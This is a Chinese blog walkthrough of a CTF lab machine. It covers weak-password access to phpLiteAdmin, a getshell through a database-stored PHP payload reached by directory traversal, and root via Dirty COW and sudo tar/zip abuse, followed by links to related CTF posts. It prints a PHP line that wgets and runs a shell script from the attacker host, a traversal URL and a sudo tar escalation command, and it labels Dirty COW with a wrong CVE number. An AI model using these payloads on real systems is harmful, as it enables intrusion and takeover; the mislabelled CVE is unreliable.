CTF靶场-目录遍历getshell+内核溢出提权/密码复用提权

最新推荐文章于 2025-04-22 11:49:39 发布
最新推荐文章于 2025-04-22 11:49:39 发布
阅读量1.5k 收藏 6
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/su__xiaoyan/article/details/112291552
版权

实验环境

攻击者:Kali Linux(192.168.0.19)
靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(64-bit)(192.168.0.249)

实验流程

  • 端口扫描
    在这里插入图片描述
  • 目录扫描
    其中/dbadmin/疑似网站数据库后台管理页面
    在这里插入图片描述
  • 访问url:http://192.168.0.249/dbadmin
    在这里插入图片描述在这里插入图片描述
  • 弱口令:admin
    在这里插入图片描述
  • 该web程序为phpliteadmin v1.9.3,存在远程代码执行漏洞,没有溢出代码,但是有一个利用文档中包含了对于该web应用程序getshell的流程,其中上传的PHP脚本文件需要进行访问才能生效。
    在这里插入图片描述在这里插入图片描述
  • 漏洞探测
    通过对该网站进行漏洞扫描发现该网站存在目录遍历漏洞
    在这里插入图片描述
  • 目录遍历漏洞验证
    在这里插入图片描述
  • 结合phpliteadmin的代码执行漏洞和目录遍历漏洞getshell
    输入数据库名称,点击create创建数据库——hack.php
    在这里插入图片描述点击新创建的数据库,输入数据表名称和数据表中的字段数量,点击go,创建数据表
    在这里插入图片描述输入字段名、字段类型,点击create创建字段,注意字段类型选择text。
    在这里插入图片描述准备好要上传到服务器上面的文件
    在这里插入图片描述
    利用python创建HTTP服务,将root用户的家目录作为网站的根目录
    在这里插入图片描述
    点击新创建的数据库,选中新创建的数据表,点击insert插入数据。<?php system("wget http://192.168.0.19:8000/shell.php -O /tmp/shell.php; chmod +x /tmp/shell.php; php /tmp/shell.php;"); ?>
    在这里插入图片描述
    攻击机监听端口
    在这里插入图片描述利用目录遍历漏洞访问该文件反弹shell:http://192.168.0.249/view.php?page=…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/usr/databases/hack.php
    在这里插入图片描述
  • 获取当前权限:www-data是Linux操作系统中运行web服务的默认用户(权限较低)
    在这里插入图片描述
  • 获取操作系统内发行版本(Ubuntu 12.04.5 LTS)和内核版本(3.2.0-23-generic)
    在这里插入图片描述
    判断是否存在代码溢出漏洞,有溢出代码
    在这里插入图片描述
  • 利用脏牛提权(cve-2016-5159)
    将提权文件上传到靶机
    溢出代码下地址:https://github.com/FireFart/dirtycow
    在这里插入图片描述
    在这里插入图片描述访问对应的数据库文件
    在这里插入图片描述在这里插入图片描述
    优化shell
    在这里插入图片描述
    编译并执行溢出代码
    在这里插入图片描述
    赋予执行权限
    在这里插入图片描述
    执行溢出代码
    在这里插入图片描述
    切换用户
    在这里插入图片描述
  • 获取flag
    在这里插入图片描述
  • 利用密码复用进行提权
    因为需要涉及到切换用户的问题同样需要利用python优化shell
    利用获取到的低权限用户在系统中搜寻敏感信息,寻找一些可能存储了密码的敏感文件或者网站的配置文件等,一定要查看系统用户的家目录。
    在这里插入图片描述
    通过查看网站的配置文件拿到数据库用户zico的登录密码
    在这里插入图片描述
    尝试使用该密码切换到zico用户,成功
    在这里插入图片描述
    查看当前用户权限,普通系统用户。
    在这里插入图片描述
    查看当前用户使用sudo命令时的权限
    当前用户在使用tar命令和zip命令时拥有root用户的权限,并且不需要验证密码
    在这里插入图片描述
    利用zip提权
    首先创建一个空文件
    在这里插入图片描述
    提权成功
    在这里插入图片描述
    同样可以利用tar命令进行提权
    sudo -u root tar cf /dev/null exp -checkpoint=1 --checkpoint-action="/bin/bash"
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3854
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
CTFHub----目录遍历
unexpectedthing的博客
08-03 1499
信息收集目录穿越目录遍历概念原因漏洞利用常见的绕过方式任意文件下载 目录穿越 点开进去,发现是许多目录,就是目录遍历的考点 一个一个的试,发现在/4/2,有flag.txt,点开得到flag 目录遍历 概念 目录遍历是由于web服务器或者web应用程序对用户输入的文件名称 安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些 特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以是web 根目录以外的文件),甚至执行系统命令。 原因 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录
文件包含LFI漏洞Getshell日志文件目录遍历
qq_60115503的博客
05-13 651
文件包含漏洞的出现及危害 文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的文件。如果一个文件包含这个漏洞,为了方便起见,经常在开发阶段就实施。由于它经常用于程序开发阶段,所以这就为后来的攻击埋下了伏笔并导致了各种基于文件的攻击。 文件包含漏洞主要是程序员把一些公用的代码写在一个单独的文件中,然后使用其他文件进行包含调用,如果需要包含的文件使用硬编码,一般是不会出现安全问题,但是
0day 挖到手软,403getshell,从零基础到精通,收藏这篇就够了!_最新getshell
最新发布
喜欢Python编程的程序员柚柚呀
04-22 869
一顿操作下来,漏洞不少。但是,看了下供应链,注册资金3kw,没证书,G!
lftp怎么上传目录 shell_利用目录遍历到文件上传getshell
weixin_39559750的博客
12-16 247
漏洞由浩哥发现,由于本人觉得有很多启发和学习的地方,因此进行复盘学习。一、目录遍历0x01 发现目录遍历 对于一般的渗透测试来说,这好歹也算是一个漏洞,可以交报告了,但是对于HW来说,不拿shell怎么可以呢?于是继续进行深入测试。0x02 发现上传点发现这块存在一个/UploadFile这个目录,并且可以使用POST请求,尝试在这块进行上传。二、文件上传0x01...
CTF_Web:8位以内可控字符getshell
AFCC_的博客(Web_Dog)
08-04 1719
题目来源 近期在练习CTF中的web题目时遇到一个8位字符以内可以随意执行命令,最终需要getshell 的题目,发现很多前辈都写了这类型的题解,但也需要自己实践一下,题目源码访问后如图: 思路:可以看出当交的参数1包含的值少于8位时,都会当作命令执行,首先?1=ls发现所有文件名都超过了8位,显然单靠这8位执行命令是不足以cat某个文件,于是需要利用拼接文件名执行代码getshell。 解题利用知识点 >a "在linux中会直接创建这个文件,但没有内容" ls -t "将目录中的文件以时间顺
bugku ctfgetshell
qq_42777804的博客
08-02 554
打开之后 是 文件上传 但是不可以上传 php文件 说明存在过滤 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 上传的文件可以为任意文件,内容也可以是任意的,内容也可以为空 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如mulTipart/form-data (其中t为大写) 所上传的文...
CTFHub-目录遍历
m0_69003772的博客
04-23 2048
CTFHub目录遍历解题过程
CTFCTFHub------web-信息泄露-目录遍历/PHPINFO
从零开始的网安生活
07-23 686
文章目录目录遍历PHPINFO 目录遍历 点击链接进入,依次在目录下寻找:1/1 1/2……最后在3/4下发现flag文件,点击即可获得flag PHPINFO 1.点击链接进入,快捷键 ctrl+f 搜索 flag 即可获得
CTF---Web---SQL注入---01---万能密码+sqlmap
qq_22160557的博客
07-29 4108
文章目录前言一、题目描述二、解题步骤1. 万能密码登录2. sqlmap爆库3. 爆表4. 爆列5. 爆字段三、总结 前言 题目分类: CTF—Web—SQL注入—01—万能密码+sqlmap 一、题目描述 题目:SQL注入 链接:192.168.87.172 二、解题步骤 1. 万能密码登录 Step1:尝试万能密码:user=‘=’,pass=‘=’,输入后登录成功,注入点在此 2. sqlmap爆库 Step2:源代码中示,交方法为POST,所以此题为sqlmap的post注入,采用kai
CTF学习记录009-简单的目录遍历
wupeng_ccab的博客
09-17 830
再点击 控制选项卡,点击 会话停止 按钮 启动目录遍历目录层级多少和需要获取的文件名称多少决定了攻击时间的长短。对于本题来说,经简单点击,发现只有二层目录,递归搜寻子目录设置为2层,其余设定可使用默认值。点击网站地图,展开所有目录,发现在 1/3/ 目录下有flag,查看响应报文,拿到flag。复杂的目录遍历可以使用 相关工具-----内容搜索。找到flag文件,查看响应报文,拿到flag。简单的目录遍历,用相关工具---参考源搜索。题目-简单的目录遍历,寻找flag。
CTF之Bukg 求getshell
weixin_41607190的博客
11-03 317
随便上传一个jpg文件,抓包修改请求的信息 要改的地方有三处 一个是Content-Type中的值大小写改一下,这里不是很明白,留个坑 第二个改后缀名,php5没有过滤 然后就是文件类型 image/jpeg ...
CTF训练计划—[SUCTF 2018]GetShell
Lemon's blog
08-19 4684
前言: 这道题考察的是构造无字母数字的webshell,也挺有趣,被卡了一天了,还有看了网上的WP,千篇一律,所以很有必要记录一下。 [SUCTF 2018]GetShell 直接给出源码 <?php if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data
hackme靶场getshell
weixin_65722679的博客
06-21 329
hackme靶场getshell
[WUSTCTF 2020]getshell
沈理大学牲的博客
11-14 303
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
【SQL注入漏洞-10】SQL注入-getshell靶场实战
cc
02-08 5804
没有写入webshell的情况有两种:● 网站的路径不对,或者没有使用双斜杠进行转义● secure_file_priv的值不是为空。利用的前条件: • 知道网站的绝对路径(根目录,或者是根目录往下的目录都可以) • web目录具有写的限,能够使用单引号 • secure_file_priv没有具体值(在mysql/my.ini中查看)
封神台靶场 绕过防护getshell
devil8123665的博客
09-24 4472
封神台 https://hack.zkaq.cn/battle 靶场 http://59.63.200.79:8003/bees/ 一 爬取方法 1 针对本题目而言,是很简单的,只需要暴出站点的目录就能在根目录下找到flag.txt 御剑扫描:需要在御剑的字典中添加flag.txt等相关关键字 访问链接即可获得flag值。 2 或者使用其他的爬虫或者是扫描工具只要能获的站点目录,就能找到flag.txt 二 注入方法 1 通过kali dirb 暴出目录,找到http://59.6.
[SUCTF 2018]GetShell
qq_43801002的博客
07-27 1400
题目 过程 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char"); } } } 发现可以上传php文件,访问过后发现,直
shenron3(密码复用,netstat)
m0_66299232的博客
10-17 529
6.把index.php源码改成php-reverse-shell.php(github里有),保存后,开启监听,访问页面,成功反弹shell。2.找了一通没找到可利用信息,而且我进不去shenron用户下,只能靠运气把唯一的密码输入进去试试。3.查看network命令的特征,是一个查tcp,udp的命令;4.我们新建一个netstat文件写入命令,让它替换network。成功进入shenron用户下,用find命令查到一个network。5.成功,进入root目录,成功拿下!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值